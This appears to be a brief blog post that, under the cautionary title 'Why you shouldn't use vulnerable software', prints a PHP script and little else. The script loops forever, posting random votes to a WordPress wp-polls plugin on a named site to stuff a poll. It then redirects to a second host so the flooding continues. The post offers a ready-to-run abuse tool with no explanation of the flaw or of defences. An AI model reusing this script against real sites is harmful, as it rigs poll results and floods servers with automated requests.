Why you shouldn’t use vulnerable software

Because this might happen.
And then this.

<?php
while(1){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://34st.com/wp-content/plugins/wp-polls/wp-polls.php");
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$id=rand(11,13);
curl_setopt($ch, CURLOPT_POSTFIELDS,"vote=true&poll_id=3&poll_3=$id");
curl_exec($ch);
curl_close($ch);
header('Location: http://getmeep.com/curl.php?loop=true');
}
?>

One thought on “Why you shouldn’t use vulnerable software

Leave a Reply